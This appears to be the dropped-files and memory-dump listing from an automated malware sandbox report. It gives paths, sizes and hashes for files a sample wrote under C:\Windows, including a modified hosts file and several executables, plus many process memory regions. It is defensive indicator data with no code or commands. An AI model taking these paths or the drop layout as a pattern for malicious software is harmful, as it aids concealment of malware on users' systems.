8c26ef179adabcd91e9917b3c0ea80d6f65420d81d658267855bc2a60e5706f9ae6e7b78c65367d6863246580d39ecef4d8ff1c5fb6a120d5cd937cfaedd08fe

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
1KB

MD5
c838e174298c403c2bbdf3cb4bdbb597

SHA1
70eeb7dfad9488f14351415800e67454e2b4b95b

SHA256
1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53

SHA512
c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

Download Submit
C:\Windows\utbcclcbi\Corporate\vfshost.exe

Filesize
381KB

MD5
fd5efccde59e94eec8bb2735aa577b2b

SHA1
51aaa248dc819d37f8b8e3213c5bdafc321a8412

SHA256
441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

SHA512
74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

Download Submit
C:\Windows\utbcclcbi\kgwtlrdzw\Result.txt

Filesize
702B

MD5
06bad762610d78ea0a7fe3e76583f68d

SHA1
3b9ea34bfbb4d0eb5ccb2eab76ae26a8927cef03

SHA256
225f49de568ad08270331e1098c77b161c09052330bd91cbcc858e85b320a049

SHA512
c1de3af2df0add7949e72f9e80db2aa04d0d1e873664b4bcbe51d71609d71f1daec9000133d5039b6a0be36ffd9a1eb6a4ee1da01d5ef2af64f049ce55acfcbd

Download Submit
C:\Windows\utbcclcbi\kgwtlrdzw\Result.txt

Filesize
972B

MD5
1381bc5394d5fe3c9c878dfd02f74711

SHA1
b6192c656fb3e788a5745578b5aa256fc8ae6cc7

SHA256
0a6e6898285e733b8ad388bf9dc4080c02e0b83c997b12a028feb76181f696d0

SHA512
9e7fbaee8c04d0752a5d4d1dd9437e3da492dbd9e25df6a1e9b3963f535f057fe363b959359aeebf3cf4ddbdbeb77d0feb4efd2420bfd8b736c00885393581e8

Download Submit
C:\Windows\utbcclcbi\kgwtlrdzw\Result.txt

Filesize
1KB

MD5
1f7e9c2b947fd9dea5aa59c20f20e9ce

SHA1
b34d9afd1885d26d5c2db138efaa1ea2c1477811

SHA256
d7c41b0d8909666433d38b3f565dbfceca622821005c3599d4531ae8875e844c

SHA512
bf111eafa2ef281845262180b5d9f8b8bd894f231718376c59b02e66e107c597b7ffa1b84915ca6701aa1e1b7583e0993e20ea2d72f2828edf61277d27d3bc72

Download Submit
C:\Windows\utbcclcbi\kgwtlrdzw\Result.txt

Filesize
1KB

MD5
a573b8b5f2ae866cf6006b8403d0b918

SHA1
a44aff9072bd6e9a195e901f94af5fdb2e2ec996

SHA256
2d44da1eb43076ea1f988894ce812b4f291c79fa4e0be4fb51e4a392ca02a947

SHA512
114f879e7b6674fe559f76f8a8e3cd1197d5bd7ae838bd7a02b68e04a5ce6809def404a4ec411e80c7aeadf6157ac293e6f01b76f33f589efba6a2dc234ab4a3

Download Submit
C:\Windows\utbcclcbi\kgwtlrdzw\Result.txt

Filesize
2KB

MD5
64693f387eda7b924f0af930eb0a0ea0

SHA1
e2eec9075ebf9d88953dc9f538e7f53760c20c94

SHA256
d1e65c5c14b99adf0e22fe8aebdbb03c37b58a53cb27a247c5f8b7f4b7d38667

SHA512
222255d6b2fe9d1d75c33a541fb7b5f07d8688bf7dfabe45b0e70c76b0c1e998f6b72a9a27312abe32b27bea911b23ba360fb53f11f446b3c681106356199756

Download Submit
C:\Windows\utbcclcbi\kgwtlrdzw\Result.txt

Filesize
3KB

MD5
facf79dea1e99d13b9378623ea8a0eeb

SHA1
8a4142703d6807dfe0fab2af93043c49de69fa9e

SHA256
b44359f5a581742f917521a1c5b33fcff701621513885b3fc9115c2112d3032c

SHA512
7604efd46039401af6ce8b30109ba8e71659f8ae38d6e90fa487ee4dc1a7353d63ca988573756c3d1febaed58c7f3006d2f4dd440bf1e3dac07409bb1fc16dbb

Download Submit
C:\Windows\utbcclcbi\kgwtlrdzw\Result.txt

Filesize
3KB

MD5
b9a37ad1a95a9cd30bffc0d5ad7ceadc

SHA1
5faf4338ebed3de726b40b6b49fe27e3b911c6ce

SHA256
de2c5c71f33377c5b21a05f081222ca4ab307d926aa8e95c201e870bb3fbca7d

SHA512
1365ecdf0632932b40d7e78232934a984bf7edc27530722d6c6c7654f31b8429357d3fe70a4b2bc81d152738d7a32854862f9bf12b5b73205c68cf33f79a802d

Download Submit
C:\Windows\utbcclcbi\kgwtlrdzw\Result.txt

Filesize
4KB

MD5
cb962b33b4e4ebcdf483e06bc63ff658

SHA1
05c91458c2e32ca49c8202f3f9bd14d0b6a9e9fb

SHA256
46cd7f0281ba66b80d949a561c0938a6d7f564034bceb014df37c28966e6467b

SHA512
a22b17ff8d346142b13b2bb6e9583cd52e30349382dd6ae21fc903eea33e39c7e9d23adb3b9047c2780bbc0832d21026e9830d908f8173806a7b931e1f2d9cf9

Download Submit
C:\Windows\utbcclcbi\kgwtlrdzw\bilutlrif.exe

Filesize
332KB

MD5
ea774c81fe7b5d9708caa278cf3f3c68

SHA1
fc09f3b838289271a0e744412f5f6f3d9cf26cee

SHA256
4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

SHA512
7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

Download Submit
C:\Windows\utbcclcbi\kgwtlrdzw\wpcap.exe

Filesize
424KB

MD5
e9c001647c67e12666f27f9984778ad6

SHA1
51961af0a52a2cc3ff2c4149f8d7011490051977

SHA256
7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

SHA512
56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

Download Submit
memory/452-149-0x0000000010000000-0x0000000010008000-memory.dmp

Filesize
32KB

Download
memory/452-162-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/620-181-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp

Filesize
364KB

Download
memory/736-232-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp

Filesize
364KB

Download
memory/880-207-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp

Filesize
364KB

Download
memory/1028-4-0x0000000000400000-0x0000000000AA4000-memory.dmp

Filesize
6.6MB

Download
memory/1028-0-0x0000000000400000-0x0000000000AA4000-memory.dmp

Filesize
6.6MB

Download
memory/1236-172-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp

Filesize
364KB

Download
memory/1616-8-0x0000000000400000-0x0000000000AA4000-memory.dmp

Filesize
6.6MB

Download
memory/1732-247-0x0000000000360000-0x0000000000372000-memory.dmp

Filesize
72KB

Download
memory/1940-234-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp

Filesize
364KB

Download
memory/2384-229-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp

Filesize
364KB

Download
memory/2604-176-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp

Filesize
364KB

Download
memory/2940-198-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp

Filesize
364KB

Download
memory/3004-220-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp

Filesize
364KB

Download
memory/3128-78-0x0000000000D20000-0x0000000000D6C000-memory.dmp

Filesize
304KB

Download
memory/3176-194-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp

Filesize
364KB

Download
memory/3180-237-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp

Filesize
364KB

Download
memory/3404-186-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp

Filesize
364KB

Download
memory/4104-224-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp

Filesize
364KB

Download
memory/4656-142-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp

Filesize
364KB

Download
memory/4656-160-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp

Filesize
364KB

Download
memory/4800-190-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp

Filesize
364KB

Download
memory/4892-215-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp

Filesize
364KB

Download
memory/4964-136-0x00007FF794740000-0x00007FF79482E000-memory.dmp

Filesize
952KB

Download
memory/4964-138-0x00007FF794740000-0x00007FF79482E000-memory.dmp

Filesize
952KB

Download
memory/5000-211-0x00007FF7C9ED0000-0x00007FF7C9F2B000-memory.dmp

Filesize
364KB

Download
memory/5104-248-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp

Filesize
1.1MB

Download
memory/5104-168-0x00000284B8160000-0x00000284B8170000-memory.dmp

Filesize
64KB

Download
memory/5104-183-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp

Filesize
1.1MB

Download
memory/5104-226-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp

Filesize
1.1MB

Download
memory/5104-179-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp

Filesize
1.1MB

Download
memory/5104-235-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp

Filesize
1.1MB

Download
memory/5104-165-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp

Filesize
1.1MB

Download
memory/5104-204-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp

Filesize
1.1MB

Download
memory/5104-217-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp

Filesize
1.1MB

Download
memory/5104-492-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp

Filesize
1.1MB

Download
memory/5104-494-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp

Filesize
1.1MB

Download
memory/5104-496-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp

Filesize
1.1MB

Download
memory/5104-751-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp

Filesize
1.1MB

Download
memory/5104-752-0x00007FF6BD1C0000-0x00007FF6BD2E0000-memory.dmp

Filesize
1.1MB

Download